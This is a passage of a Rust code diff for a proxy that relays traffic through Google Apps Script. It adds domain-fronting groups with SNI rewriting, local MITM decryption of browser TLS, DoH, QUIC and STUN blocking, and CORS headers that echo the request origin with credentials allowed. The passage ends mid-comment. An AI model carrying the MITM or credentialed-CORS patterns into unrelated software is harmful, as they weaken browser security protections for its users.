+            bypass_doh: !config.tunnel_doh,
+            block_doh: config.block_doh,
+            bypass_doh_hosts: config.bypass_doh_hosts.clone(),
+            fronting_groups,
         });
 
         let socks5_port = config.socks5_port.unwrap_or(config.listen_port + 1);
@@ -228,6 +525,8 @@ impl ProxyServer {
             mitm,
             rewrite_ctx,
             tunnel_mux: None, // initialized in run() inside the tokio runtime
+            coalesce_step_ms: if config.coalesce_step_ms > 0 { config.coalesce_step_ms as u64 } else { 10 },
+            coalesce_max_ms: if config.coalesce_max_ms > 0 { config.coalesce_max_ms as u64 } else { 1000 },
         })
     }
 
@@ -241,7 +540,7 @@ impl ProxyServer {
         // Initialize TunnelMux inside the runtime (tokio::spawn requires it).
         if self.rewrite_ctx.mode == Mode::Full {
             if let Some(f) = self.fronter.as_ref() {
-                self.tunnel_mux = Some(TunnelMux::start(f.clone()));
+                self.tunnel_mux = Some(TunnelMux::start(f.clone(), self.coalesce_step_ms, self.coalesce_max_ms));
             }
         }
 
@@ -259,14 +558,54 @@ impl ProxyServer {
         );
         // Pre-warm the outbound connection pool so the user's first request
         // doesn't pay a fresh TLS handshake to Google edge. Best-effort;
-        // failures are logged and ignored. Skipped in `google_only` — there
-        // is no fronter to warm.
+        // failures are logged and ignored. Skipped in `direct` mode —
+        // there is no fronter to warm.
+        //
+        // Sized to roughly match a browser's parallel-connection burst at
+        // startup. The previous fixed `3` was fine for a single deployment
+        // but left requests 4-10 of the opening burst paying a cold TLS
+        // handshake each (~300ms). Scaling with deployment count gives
+        // multi-account configs a proportionally warmer pool, capped so
+        // single-deployment users don't hammer Google edge unnecessarily.
         if let Some(warm_fronter) = self.fronter.clone() {
+            let n = warm_fronter.num_scripts().clamp(6, 16);
             tokio::spawn(async move {
-                warm_fronter.warm(3).await;
+                warm_fronter.warm(n).await;
             });
         }
 
+        // Apps Script container keepalive. `warm()` above keeps the TCP
+        // pool warm at startup, but the V8 container behind UrlFetchApp
+        // goes cold after ~5min idle and costs 1-3s to wake. A periodic
+        // HEAD ping prevents the cold-start lag on the first request
+        // after a quiet pause (most visible as YouTube player stalls).
+        // Skipped in direct mode for the same reason as warm —
+        // there's no fronter to ping.
+        //
+        // The handle is captured (not fire-and-forget) so the shutdown
+        // arm of the select! below can abort it. Without that, hitting
+        // Stop in the UI would leave the keepalive holding an
+        // Arc<DomainFronter> on stale config and pinging Apps Script
+        // every 240s — same class of bug that issue #99 hit for the
+        // accept loops.
+        let keepalive_task = if let Some(keepalive_fronter) = self.fronter.clone() {
+            tokio::spawn(async move {
+                keepalive_fronter.run_keepalive().await;
+            })
+        } else {
+            tokio::spawn(async move { std::future::pending::<()>().await })
+        };
+
+        // Background pool refill: keeps at least POOL_MIN ready TLS
+        // connections so acquire() never pays a cold handshake.
+        let refill_task = if let Some(refill_fronter) = self.fronter.clone() {
+            tokio::spawn(async move {
+                refill_fronter.run_pool_refill().await;
+            })
+        } else {
+            tokio::spawn(async move { std::future::pending::<()>().await })
+        };
+
         let stats_task = if let Some(stats_fronter) = self.fronter.clone() {
             tokio::spawn(async move {
                 let mut ticker = tokio::time::interval(std::time::Duration::from_secs(60));
@@ -374,6 +713,8 @@ impl ProxyServer {
             _ = &mut shutdown_rx => {
                 tracing::info!("Shutdown signal received, stopping listeners");
                 stats_task.abort();
+                keepalive_task.abort();
+                refill_task.abort();
                 http_task.abort();
                 socks_task.abort();
             }
@@ -447,8 +788,26 @@ async fn handle_http_client(
     tunnel_mux: Option<Arc<TunnelMux>>,
 ) -> std::io::Result<()> {
     let (head, leftover) = match read_http_head(&mut sock).await? {
-        Some(v) => v,
-        None => return Ok(()),
+        HeadReadResult::Got { head, leftover } => (head, leftover),
+        HeadReadResult::Closed => return Ok(()),
+        HeadReadResult::Oversized => {
+            // Reply with 431 instead of just dropping the socket so the
+            // browser shows a real error rather than retrying the same
+            // oversized request in a loop.
+            tracing::warn!(
+                "request head exceeds {} bytes — refusing with 431",
+                MAX_HEADER_BYTES
+            );
+            let _ = sock
+                .write_all(
+                    b"HTTP/1.1 431 Request Header Fields Too Large\r\n\
+                      Connection: close\r\n\
+                      Content-Length: 0\r\n\r\n",
+                )
+                .await;
+            let _ = sock.flush().await;
+            return Ok(());
+        }
     };
 
     let (method, target, _version, _headers) = parse_request_head(&head)
@@ -456,30 +815,41 @@ async fn handle_http_client(
 
     if method.eq_ignore_ascii_case("CONNECT") {
         let (host, port) = parse_host_port(&target);
+        // Mirror the SOCKS5 short-circuit: if the tunnel-node just failed
+        // this (host, port) with unreachable, return 502 immediately rather
+        // than acknowledging the CONNECT and blowing tunnel quota on a
+        // guaranteed retry. See `TunnelMux::is_unreachable` for context.
+        if let Some(ref mux) = tunnel_mux {
+            if mux.is_unreachable(&host, port) {
+                tracing::info!("CONNECT {}:{} (negative-cached, refusing)", host, port);
+                let _ = sock
+                    .write_all(b"HTTP/1.1 502 Bad Gateway\r\nContent-Length: 0\r\nConnection: close\r\n\r\n")
+                    .await;
+                let _ = sock.flush().await;
+                return Ok(());
+            }
+        }
         sock.write_all(b"HTTP/1.1 200 Connection Established\r\n\r\n")
             .await?;
         sock.flush().await?;
         dispatch_tunnel(sock, host, port, fronter, mitm, rewrite_ctx, tunnel_mux).await
     } else {
-        // Plain HTTP proxy request (e.g. `GET http://…`). The Apps Script
-        // relay is the only code path that can fulfil this, so in google_only
-        // bootstrap mode we return a clear 502 instead.
+        // Plain HTTP proxy request (e.g. `GET http://…`).
+        //
+        // apps_script mode: relay through the Apps Script fronter (which
+        // is the whole point of the relay).
+        //
+        // direct mode: no fronter exists, so passthrough as raw TCP.
+        // Same contract as `dispatch_tunnel` honors for CONNECT in
+        // direct mode — anything not on the Google edge / not in a
+        // configured fronting_group is forwarded direct (or via
+        // `upstream_socks5`) so the user's browser still works while
+        // they finish setting up Apps Script. Issue: typing a bare
+        // `http://example.com` URL used to return a 502 here even
+        // though `https://example.com` (CONNECT) worked fine.
         match fronter {
             Some(f) => do_plain_http(sock, &head, &leftover, f).await,
-            None => {
-                let _ = sock
-                    .write_all(
-                        b"HTTP/1.1 502 Bad Gateway\r\n\
-                          Content-Type: text/plain; charset=utf-8\r\n\
-                          Content-Length: 120\r\n\
-                          Connection: close\r\n\r\n\
-                          google_only mode: plain HTTP proxy requests are not supported. \
-                          Browse https over CONNECT, or switch to apps_script mode.",
-                    )
-                    .await;
-                let _ = sock.flush().await;
-                Ok(())
-            }
+            None => do_plain_http_passthrough(sock, &head, &leftover, &rewrite_ctx).await,
         }
     }
 }
@@ -557,6 +927,32 @@ async fn handle_socks5_client(
         return handle_socks5_udp_associate(sock, rewrite_ctx, tunnel_mux).await;
     }
 
+    // Negative-cache short-circuit: if the tunnel-node just failed to reach
+    // this exact (host, port) with `Network is unreachable` / `No route to
+    // host`, reply 0x04 (Host unreachable) immediately. Saves a 1.5–2s tunnel
+    // round-trip on guaranteed-failing targets — the IPv6 probe retry loop
+    // is the main offender on devices without IPv6.
+    if let Some(ref mux) = tunnel_mux {
+        if mux.is_unreachable(&host, port) {
+            tracing::info!("SOCKS5 CONNECT -> {}:{} (negative-cached, refusing)", host, port);
+            sock.write_all(&[0x05, 0x04, 0x00, 0x01, 0, 0, 0, 0, 0, 0])
+                .await?;
+            sock.flush().await?;
+            return Ok(());
+        }
+    }
+
+    // Reject STUN/TURN UDP ports immediately so WebRTC (Meet,
+    // Telegram calls) skips UDP ICE candidates and falls back to
+    // TCP TURN on :443 without waiting for a timeout.
+    if rewrite_ctx.block_stun && matches!(port, 3478 | 5349 | 19302) {
+        tracing::info!("SOCKS5 CONNECT -> {}:{} (STUN/TURN blocked, forcing TCP fallback)", host, port);
+        sock.write_all(&[0x05, 0x05, 0x00, 0x01, 0, 0, 0, 0, 0, 0])
+            .await?;
+        sock.flush().await?;
+        return Ok(());
+    }
+
     tracing::info!("SOCKS5 CONNECT -> {}:{}", host, port);
 
     // Success reply with zeroed BND.
@@ -583,7 +979,7 @@ struct SocksUdpTarget {
 /// to abort mid-await.
 struct UdpRelaySession {
     sid: String,
-    uplink: mpsc::Sender<Vec<u8>>,
+    uplink: mpsc::Sender<Bytes>,
 }
 
 /// All per-ASSOCIATE UDP relay state behind a single mutex so insertion
@@ -609,7 +1005,7 @@ impl UdpRelayState {
         }
     }
 
-    fn get_uplink(&self, target: &SocksUdpTarget) -> Option<mpsc::Sender<Vec<u8>>> {
+    fn get_uplink(&self, target: &SocksUdpTarget) -> Option<mpsc::Sender<Bytes>> {
         self.sessions.get(target).map(|s| s.uplink.clone())
     }
 
@@ -736,7 +1132,15 @@ async fn handle_socks5_udp_associate(
         client_peer_ip
     );
 
-    let mut buf = vec![0u8; SOCKS5_UDP_RECV_BUF_BYTES];
+    // Fixed reusable recv buffer. We deliberately don't go the
+    // `BytesMut::split().freeze()` route here even though `tunnel_loop`
+    // does: in TCP the read region IS the payload, but UDP always
+    // slices the SOCKS5 header off, so we'd be copying out anyway —
+    // and a frozen `Bytes` from the recv buf would refcount-pin the
+    // full ~65 KB allocation behind a tiny DNS reply, ballooning
+    // memory under bursts. Right-sized `Bytes::copy_from_slice` on
+    // accepted payloads keeps retention proportional to actual data.
+    let mut recv_buf = vec![0u8; SOCKS5_UDP_RECV_BUF_BYTES];
     let mut control_buf = [0u8; 1];
     let mut client_addr: Option<SocketAddr> = None;
     let state: Arc<Mutex<UdpRelayState>> = Arc::new(Mutex::new(UdpRelayState::new()));
@@ -752,7 +1156,7 @@ async fn handle_socks5_udp_associate(
 
     loop {
         tokio::select! {
-            recv = udp.recv_from(&mut buf) => {
+            recv = udp.recv_from(&mut recv_buf) => {
                 let (n, peer) = match recv {
                     Ok(v) => v,
                     Err(e) => {
@@ -760,6 +1164,7 @@ async fn handle_socks5_udp_associate(
                         break;
                     }
                 };
+
                 // Source-IP check: anything not from the SOCKS5 client's
                 // host is dropped silently.
                 if peer.ip() != client_peer_ip {
@@ -780,9 +1185,34 @@ async fn handle_socks5_udp_associate(
                 // can race one bad packet to DoS the legitimate client
                 // (whose real datagram, sent from a different ephemeral
                 // port, would then be silently rejected).
-                let Some((target, payload)) = parse_socks5_udp_packet(&buf[..n]) else {
+                let Some((target, payload_off)) = parse_socks5_udp_packet_offsets(&recv_buf[..n]) else {
                     continue;
                 };
+                let payload_slice = &recv_buf[payload_off..n];
+
+                // Issue #213: client-side QUIC block. UDP/443 is
+                // HTTP/3 — drop the datagram silently so the client
+                // stack retries a couple of times and then falls back
+                // to TCP/HTTPS, which goes through the regular CONNECT
+                // path. Skipping this at the SOCKS5 layer (rather than
+                // letting it hit the tunnel-node) avoids paying the
+                // 200–500 ms tunnel-node round-trip per dropped QUIC
+                // datagram, which would otherwise compound during the
+                // 1–3 retries before the browser falls back.
+                //
+                // Silent drop instead of an explicit error reply: the
+                // SOCKS5 UDP wire has no "destination unreachable"
+                // datagram — `0x04` only exists in TCP CONNECT replies
+                // (RFC 1928 §6). The browser's QUIC stack already has
+                // a "no response → fall back" timeout, so silent drop
+                // is the contractually correct shape.
+                if rewrite_ctx.block_quic && target.port == 443 {
+                    tracing::debug!(
+                        "udp dropped: block_quic=true, target {}:443",
+                        target.host
+                    );
+                    continue;
+                }
 
                 // RFC 1928 §6: lock to the first VALID datagram's source
                 // port. Subsequent datagrams must come from the same
@@ -800,19 +1230,26 @@ async fn handle_socks5_udp_associate(
                 // the mux. Each datagram costs ~payload * 1.33 in the
                 // batched JSON envelope plus tunnel-node CPU; uncapped,
                 // a runaway client can exhaust Apps Script quota.
-                if payload.len() > MAX_UDP_PAYLOAD_BYTES {
+                if payload_slice.len() > MAX_UDP_PAYLOAD_BYTES {
                     oversized_dropped += 1;
                     if oversized_dropped == 1 || oversized_dropped.is_multiple_of(100) {
                         tracing::debug!(
                             "udp datagram dropped: {} B > {} B (count={})",
-                            payload.len(),
+                            payload_slice.len(),
                             MAX_UDP_PAYLOAD_BYTES,
                             oversized_dropped,
                         );
                     }
                     continue;
                 }
-                let payload = payload.to_vec();
+
+                // Right-sized copy: the queued/in-flight payload owns its
+                // own allocation, so the recv buffer can be reused on the
+                // next iteration without keeping every queued datagram
+                // alive. Sized to the actual payload (≤ MAX_UDP_PAYLOAD_BYTES
+                // = 9 KB after the guard above), not the full ~65 KB recv
+                // buffer.
+                let payload = Bytes::copy_from_slice(payload_slice);
 
                 // Fast path: existing session — push payload onto its
                 // bounded uplink queue, drop on overflow (UDP semantics).
@@ -886,7 +1323,7 @@ async fn handle_socks5_udp_associate(
                     continue;
                 }
 
-                let (uplink_tx, uplink_rx) = mpsc::channel::<Vec<u8>>(UDP_UPLINK_QUEUE);
+                let (uplink_tx, uplink_rx) = mpsc::channel::<Bytes>(UDP_UPLINK_QUEUE);
                 let task_mux = mux.clone();
                 let task_udp = udp.clone();
                 let task_target = target.clone();
@@ -959,7 +1396,7 @@ async fn udp_session_task(
     sid: String,
     target: SocksUdpTarget,
     client_addr: SocketAddr,
-    mut uplink_rx: mpsc::Receiver<Vec<u8>>,
+    mut uplink_rx: mpsc::Receiver<Bytes>,
 ) {
     let mut backoff = UDP_INITIAL_POLL_DELAY;
     loop {
@@ -1067,7 +1504,20 @@ async fn write_socks5_reply(
     sock.flush().await
 }
 
-fn parse_socks5_udp_packet(buf: &[u8]) -> Option<(SocksUdpTarget, &[u8])> {
+/// Parse the SOCKS5 UDP frame header and return the target plus the byte
+/// offset at which the payload starts. Splitting "structure parsing"
+/// from "give me a payload slice" lets the recv hot path stay on a
+/// fixed reusable `Vec<u8>` buffer and only allocate a right-sized
+/// `Bytes::copy_from_slice(&recv_buf[off..n])` for accepted payloads
+/// (after the size guard). DO NOT change this back to a zero-copy
+/// `Bytes::slice` path: that was tried and reverted because slicing
+/// the recv buffer with `bytes` 1.x refcounts the whole ~65 KB
+/// allocation, so a queued tiny DNS reply pinned the full datagram-
+/// sized buffer until it drained — burst retention regressed by
+/// orders of magnitude on UDP-heavy workloads. The thin
+/// `parse_socks5_udp_packet` wrapper below keeps existing `&[u8]`
+/// callers (tests) working.
+fn parse_socks5_udp_packet_offsets(buf: &[u8]) -> Option<(SocksUdpTarget, usize)> {
     if buf.len() < 4 || buf[0] != 0 || buf[1] != 0 || buf[2] != 0 {
         return None;
     }
@@ -1122,10 +1572,15 @@ fn parse_socks5_udp_packet(buf: &[u8]) -> Option<(SocksUdpTarget, &[u8])> {
             atyp,
             addr,
         },
-        &buf[pos..],
+        pos,
     ))
 }
 
+/// Slice-returning wrapper over `parse_socks5_udp_packet_offsets`.
+fn parse_socks5_udp_packet(buf: &[u8]) -> Option<(SocksUdpTarget, &[u8])> {
+    parse_socks5_udp_packet_offsets(buf).map(|(target, off)| (target, &buf[off..]))
+}
+
 fn build_socks5_udp_packet(target: &SocksUdpTarget, payload: &[u8]) -> Vec<u8> {
     let mut out = Vec::with_capacity(4 + target.addr.len() + 2 + payload.len() + 1);
     out.extend_from_slice(&[0, 0, 0, target.atyp]);
@@ -1190,6 +1645,40 @@ async fn dispatch_tunnel(
         return Ok(());
     }
 
+    // 0.4. DoH block. Reject connections to known DoH endpoints so browsers
+    //      fall back to system DNS (tun2proxy virtual DNS — instant).
+    //      Takes priority over bypass_doh.
+    if rewrite_ctx.block_doh
+        && port == 443
+        && matches_doh_host(&host, &rewrite_ctx.bypass_doh_hosts)
+    {
+        tracing::info!("dispatch {}:{} -> blocked (block_doh)", host, port);
+        drop(sock);
+        return Ok(());
+    }
+
+    // 0.5. DoH bypass. DNS-over-HTTPS is the dominant per-flow DNS cost
+    //      in Full mode (every browser name lookup costs a ~2 s Apps
+    //      Script round-trip), and the tunnel adds no privacy beyond
+    //      what DoH already provides. Route known DoH hosts directly.
+    //      Port-gated to 443 so a non-TLS CONNECT to e.g. `dns.google:80`
+    //      doesn't get diverted off-tunnel by accident.
+    //      See `DEFAULT_DOH_HOSTS` and config.rs `tunnel_doh`.
+    if rewrite_ctx.bypass_doh
+        && port == 443
+        && matches_doh_host(&host, &rewrite_ctx.bypass_doh_hosts)
+    {
+        let via = rewrite_ctx.upstream_socks5.as_deref();
+        tracing::info!(
+            "dispatch {}:{} -> raw-tcp ({}) (doh bypass)",
+            host,
+            port,
+            via.unwrap_or("direct")
+        );
+        plain_tcp_passthrough(sock, &host, port, via).await;
+        return Ok(());
+    }
+
     // 1. Full tunnel mode: ALL traffic goes through the batch multiplexer
     //    (Apps Script → tunnel node → real TCP). No MITM, no cert.
     if rewrite_ctx.mode == Mode::Full {
@@ -1209,6 +1698,40 @@ async fn dispatch_tunnel(
         return Ok(());
     }
 
+    // 2a. User-configured fronting groups (Vercel, Fastly, etc.). Wins
+    //     over the built-in Google SNI-rewrite suffix list — if a user
+    //     adds e.g. `vercel.com` to a Vercel fronting group, we hit
+    //     Vercel's edge with sni=react.dev rather than trying to resolve
+    //     it through Google's. Port-gated to 443: SNI-rewrite needs a
+    //     real ClientHello and a non-TLS CONNECT to the same hostname
+    //     would just hang. Only HTTPS sites are fronted by these CDNs in
+    //     practice, so the gate has no false negatives we care about.
+    if port == 443 {
+        // `Arc::clone` here is refcount-only; we hold it across the
+        // await below without keeping `rewrite_ctx` borrowed.
+        let group_match =
+            match_fronting_group(&host, &rewrite_ctx.fronting_groups).map(Arc::clone);
+        if let Some(group) = group_match {
+            tracing::info!(
+                "dispatch {}:{} -> sni-rewrite tunnel (fronting group '{}', edge {} sni={})",
+                host,
+                port,
+                group.name,
+                group.ip,
+                group.sni
+            );
+            return do_sni_rewrite_tunnel_from_tcp(
+                sock,
+                &host,
+                port,
+                mitm,
+                rewrite_ctx,
+                Some(group),
+            )
+            .await;
+        }
+    }
+
     // 2. Explicit hosts override or SNI-rewrite suffix: for HTTPS targets,
     //    use the TLS SNI-rewrite tunnel (skipped in full mode above).
     if should_use_sni_rewrite(
@@ -1222,17 +1745,18 @@ async fn dispatch_tunnel(
             host,
             port
         );
-        return do_sni_rewrite_tunnel_from_tcp(sock, &host, port, mitm, rewrite_ctx).await;
+        return do_sni_rewrite_tunnel_from_tcp(sock, &host, port, mitm, rewrite_ctx, None).await;
     }
 
-    // 3. google_only bootstrap: no Apps Script relay exists. Anything that
-    //    isn't SNI-rewrite-matched gets direct TCP passthrough so the user's
-    //    browser still works while they're deploying Code.gs. They'd switch
-    //    to apps_script mode for the real DPI bypass.
-    if rewrite_ctx.mode == Mode::GoogleOnly {
+    // 3. direct mode: no Apps Script relay exists. Anything that isn't
+    //    SNI-rewrite-matched (Google edge or a configured fronting_group)
+    //    gets raw TCP passthrough so the user's browser still works while
+    //    they're deploying Code.gs. They'd switch to apps_script mode for
+    //    full DPI bypass.
+    if rewrite_ctx.mode == Mode::Direct {
         let via = rewrite_ctx.upstream_socks5.as_deref();
         tracing::info!(
-            "dispatch {}:{} -> raw-tcp ({}) (google_only: no relay)",
+            "dispatch {}:{} -> raw-tcp ({}) (direct mode: no relay)",
             host,
             port,
             via.unwrap_or("direct")
@@ -1499,14 +2023,35 @@ fn looks_like_http(first_bytes: &[u8]) -> bool {
 /// Read an HTTP head (request line + headers) up to the first \r\n\r\n.
 /// Returns (head_bytes, leftover_after_head). The leftover may contain part
 /// of the request body already received.
-async fn read_http_head(sock: &mut TcpStream) -> std::io::Result<Option<(Vec<u8>, Vec<u8>)>> {
+/// Maximum size of an HTTP request head (request line + all headers).
+///
+/// Set to match upstream Python's `MAX_HEADER_BYTES` (64 KB,
+/// masterking32/MasterHttpRelayVPN constants.py). Real browsers
+/// virtually never exceed ~16 KB; anything past 64 KB is either a
+/// buggy client or a deliberate slowloris-style header bomb.
+/// Previously 1 MB, which let a misbehaving client allocate a lot
+/// of memory before failing.
+const MAX_HEADER_BYTES: usize = 64 * 1024;
+
+/// Result of `read_http_head` / `read_http_head_io`.
+/// `Oversized` is distinct from other I/O errors so the caller can
+/// reply with `431 Request Header Fields Too Large` instead of just
+/// dropping the connection (which a browser would silently retry,
+/// reproducing the same problem).
+enum HeadReadResult {
+    Got { head: Vec<u8>, leftover: Vec<u8> },
+    Closed,
+    Oversized,
+}
+
+async fn read_http_head(sock: &mut TcpStream) -> std::io::Result<HeadReadResult> {
     let mut buf = Vec::with_capacity(4096);
     let mut tmp = [0u8; 4096];
     loop {
         let n = sock.read(&mut tmp).await?;
         if n == 0 {
             return if buf.is_empty() {
-                Ok(None)
+                Ok(HeadReadResult::Closed)
             } else {
                 Err(std::io::Error::new(
                     std::io::ErrorKind::UnexpectedEof,
@@ -1518,13 +2063,10 @@ async fn read_http_head(sock: &mut TcpStream) -> std::io::Result<Option<(Vec<u8>
         if let Some(pos) = find_headers_end(&buf) {
             let head = buf[..pos].to_vec();
             let leftover = buf[pos..].to_vec();
-            return Ok(Some((head, leftover)));
+            return Ok(HeadReadResult::Got { head, leftover });
         }
-        if buf.len() > 1024 * 1024 {
-            return Err(std::io::Error::new(
-                std::io::ErrorKind::InvalidData,
-                "headers too large",
-            ));
+        if buf.len() > MAX_HEADER_BYTES {
+            return Ok(HeadReadResult::Oversized);
         }
     }
 }
@@ -1680,17 +2222,37 @@ async fn do_sni_rewrite_tunnel_from_tcp(
     port: u16,
     mitm: Arc<Mutex<MitmCertManager>>,
     rewrite_ctx: Arc<RewriteCtx>,
+    // When Some, overrides the default Google edge target with a
+    // user-configured fronting group's (ip, sni). `Arc` so the
+    // dispatcher hands us a refcount-only clone — the resolved
+    // group also carries the matcher's normalized domain list which
+    // we don't need here. None = built-in Google edge path.
+    group: Option<Arc<FrontingGroupResolved>>,
 ) -> std::io::Result<()> {
-    let target_ip = hosts_override(&rewrite_ctx.hosts, host)
-        .map(|s| s.to_string())
-        .unwrap_or_else(|| rewrite_ctx.google_ip.clone());
+    let (target_ip, outbound_sni, server_name) = match &group {
+        Some(g) => (g.ip.clone(), g.sni.clone(), g.server_name.clone()),
+        None => {
+            let ip = hosts_override(&rewrite_ctx.hosts, host)
+                .map(|s| s.to_string())
+                .unwrap_or_else(|| rewrite_ctx.google_ip.clone());
+            let sni = rewrite_ctx.front_domain.clone();
+            let sn = match ServerName::try_from(sni.clone()) {
+                Ok(n) => n,
+                Err(e) => {
+                    tracing::error!("invalid front_domain '{}': {}", sni, e);
+                    return Ok(());
+                }
+            };
+            (ip, sni, sn)
+        }
+    };
 
     tracing::info!(
         "SNI-rewrite tunnel -> {}:{} via {} (outbound SNI={})",
         host,
         port,
         target_ip,
-        rewrite_ctx.front_domain
+        outbound_sni
     );
 
     // Accept browser TLS with a cert we sign for `host`.
@@ -1734,13 +2296,6 @@ async fn do_sni_rewrite_tunnel_from_tcp(
     };
     let _ = upstream_tcp.set_nodelay(true);
 
-    let server_name = match ServerName::try_from(rewrite_ctx.front_domain.clone()) {
-        Ok(n) => n,
-        Err(e) => {
-            tracing::error!("invalid front_domain '{}': {}", rewrite_ctx.front_domain, e);
-            return Ok(());
-        }
-    };
     let outbound = match rewrite_ctx
         .tls_connector
         .connect(server_name, upstream_tcp)
@@ -1833,8 +2388,31 @@ where
     S: tokio::io::AsyncRead + tokio::io::AsyncWrite + Unpin,
 {
     let (head, leftover) = match read_http_head_io(stream).await? {
-        Some(v) => v,
-        None => return Ok(false),
+        HeadReadResult::Got { head, leftover } => (head, leftover),
+        HeadReadResult::Closed => return Ok(false),
+        HeadReadResult::Oversized => {
+            // Inside MITM: same reasoning as the plaintext path. Return
+            // 431 over the decrypted stream so the browser surfaces a
+            // real error to the user instead of looping a connection
+            // reset, which was the symptom upstream caught (Apps Script
+            // ate malformed JSON when truncated header blocks were
+            // forwarded blindly).
+            tracing::warn!(
+                "MITM header block exceeds {} bytes — closing ({}:{})",
+                MAX_HEADER_BYTES,
+                host,
+                port
+            );
+            let _ = stream
+                .write_all(
+                    b"HTTP/1.1 431 Request Header Fields Too Large\r\n\
+                      Connection: close\r\n\
+                      Content-Length: 0\r\n\r\n",
+                )
+                .await;
+            let _ = stream.flush().await;
+            return Ok(false);
+        }
     };
 
     let (method, path, _version, headers) = match parse_request_head(&head) {
@@ -1862,7 +2440,7 @@ where
     // pourya-p's log in #64 showed the real Host header. Match every
     // subdomain of x.com here.
     let host_lower = host.to_ascii_lowercase();
-    let is_x_com = host_lower == "x.com" || host_lower.ends_with(".x.com");
+    let is_x_com = host_lower == "x.com" || host_lower.ends_with(".x.com") || host_lower == "twitter.com" || host_lower.ends_with(".twitter.com");
     let path = if is_x_com && path.starts_with("/i/api/graphql/") && path.contains("?variables=") {
         match path.split_once('&') {
             Some((short, _)) => {
@@ -1930,6 +2508,32 @@ where
 
     tracing::info!("relay {} {}", method, url);
 
+    // CORS response-header injection. The preflight short-circuit
+    // above handles `OPTIONS`, but the *actual* fetch that follows
+    // also needs CORS-compliant headers on the way back, or the
+    // browser drops the response and the JS layer sees a CORS
+    // failure. Apps Script's `UrlFetchApp.fetch()` preserves the
+    // origin server's response headers inconsistently — sometimes the
+    // destination returns `Access-Control-Allow-Origin: *` (which is
+    // incompatible with `Allow-Credentials: true`), sometimes omits
+    // ACL headers entirely. The visible symptom on YouTube is comments
+    // not loading and the "restricted" gate firing on cross-origin
+    // XHR responses that the browser rejected before the JS handler
+    // could even read them. Idea credit: ThisIsDara/mhr-cfw-go.
+    //
+    // Only injects when the request had an `Origin` header — non-CORS
+    // requests (top-level navigation, plain image fetches) don't need
+    // the headers and adding them would be noise. The relay response
+    // is otherwise byte-identical, so this never affects non-browser
+    // clients (curl, wget, app-level HTTP clients).
+    let cors_origin = header_value(&headers, "origin").map(|s| s.to_string());
+    let transform_head = |head: &[u8]| -> Vec<u8> {
+        match cors_origin.as_deref() {
+            Some(origin) => inject_cors_into_head(head, origin).unwrap_or_else(|| head.to_vec()),
+            None => head.to_vec(),
+        }
+    };
+
     // For GETs without a body, take the range-parallel path — probes
     // with `Range: bytes=0-<chunk>`, and if the origin supports ranges,
     // fetches the rest in parallel 256 KB chunks. This is what lets
@@ -1938,14 +2542,23 @@ where
     // Anything with a body (POST/PUT/PATCH) goes through the normal
     // relay path — range semantics on mutating requests are undefined
     // and would break form submissions.
-    let response = if method.eq_ignore_ascii_case("GET") && body.is_empty() {
+    //
+    // The range-parallel call writes directly to the stream so files
+    // above Apps Script's single-GET ceiling (~40 MiB) can stream
+    // through chunk-by-chunk instead of being buffered into one giant
+    // `Vec<u8>` (which previously failed for 100 MiB+ downloads — #1042).
+    if method.eq_ignore_ascii_case("GET") && body.is_empty() {
         fronter
-            .relay_parallel_range(&method, &url, &headers, &body)
-            .await
+            .relay_parallel_range_to(stream, &method, &url, &headers, &body, transform_head)
+            .await?;
     } else {
-        fronter.relay(&method, &url, &headers, &body).await
-    };
-    stream.write_all(&response).await?;
+        let response = fronter.relay(&method, &url, &headers, &body).await;
+        let response = match cors_origin.as_deref() {
+            Some(origin) => inject_cors_response_headers(&response, origin),
+            None => response,
+        };
+        stream.write_all(&response).await?;
+    }
     stream.flush().await?;
 
     // Keep-alive unless the client asked to close.
@@ -1955,7 +2568,7 @@ where
     Ok(!connection_close)
 }
 
-async fn read_http_head_io<S>(stream: &mut S) -> std::io::Result<Option<(Vec<u8>, Vec<u8>)>>
+async fn read_http_head_io<S>(stream: &mut S) -> std::io::Result<HeadReadResult>
 where
     S: tokio::io::AsyncRead + Unpin,
 {
@@ -1965,7 +2578,7 @@ where
         let n = stream.read(&mut tmp).await?;
         if n == 0 {
             return if buf.is_empty() {
-                Ok(None)
+                Ok(HeadReadResult::Closed)
             } else {
                 Err(std::io::Error::new(
                     std::io::ErrorKind::UnexpectedEof,
@@ -1977,13 +2590,10 @@ where
         if let Some(pos) = find_headers_end(&buf) {
             let head = buf[..pos].to_vec();
             let leftover = buf[pos..].to_vec();
-            return Ok(Some((head, leftover)));
+            return Ok(HeadReadResult::Got { head, leftover });
         }
-        if buf.len() > 1024 * 1024 {
-            return Err(std::io::Error::new(
-                std::io::ErrorKind::InvalidData,
-                "headers too large",
-            ));
+        if buf.len() > MAX_HEADER_BYTES {
+            return Ok(HeadReadResult::Oversized);
         }
     }
 }
@@ -1995,6 +2605,99 @@ fn header_value<'a>(headers: &'a [(String, String)], name: &str) -> Option<&'a s
         .map(|(_, v)| v.as_str())
 }
 
+/// Strip any `Access-Control-*` response headers the origin server
+/// emitted (or that Apps Script's `UrlFetchApp.fetch()` may have
+/// mangled / dropped) and inject a permissive set keyed on the
+/// browser's request `Origin`. Returns a new response buffer; never
+/// mutates in place.
+///
+/// The body is preserved byte-for-byte; only the header block before
+/// the first `\r\n\r\n` is rewritten. If the response has no
+/// header/body separator, or its head is not valid UTF-8, it is
+/// returned unchanged so edge-case responses (e.g. raw error blobs
+/// from upstream) aren't corrupted.
+///
+/// Why permissive (explicit `Allow-Methods` list, `Allow-Headers: *`,
+/// `Expose-Headers: *`): the browser already pre-cleared the request
+/// via the `OPTIONS` preflight short-circuit in the relay handler, and
+/// the relay path doesn't expose anything that wasn't already going to
+/// the destination through the user's own MITM trust anchor. The wide
+/// permissions only relax browser-side CORS gating; they don't widen
+/// the underlying network reach. `Allow-Credentials: true` is only
+/// valid next to an explicit origin (the spec rejects `*` alongside
+/// credentials) — that's why we echo the request's origin and never
+/// use `*`.
+fn inject_cors_response_headers(response: &[u8], origin: &str) -> Vec<u8> {
+    // Locate the first header / body separator. Without one the
+    // response isn't HTTP/1.x-shaped, so hand it back unchanged.
+    let sep = b"\r\n\r\n";
+    let Some(idx) = response
+        .windows(sep.len())
+        .position(|w| w == sep)
+    else {
+        return response.to_vec();
+    };
+    let head_with_terminator = &response[..idx + sep.len()];
+    let body = &response[idx + sep.len()..];
+
+    let Some(mut buf) = inject_cors_into_head(head_with_terminator, origin) else {
+        return response.to_vec(); // head was not valid UTF-8: pass through untouched
+    };
+    buf.extend_from_slice(body);
+    buf
+}
+
+/// Head-only variant of `inject_cors_response_headers`. Takes the head
+/// block of an HTTP/1.x response *including* the trailing `\r\n\r\n`
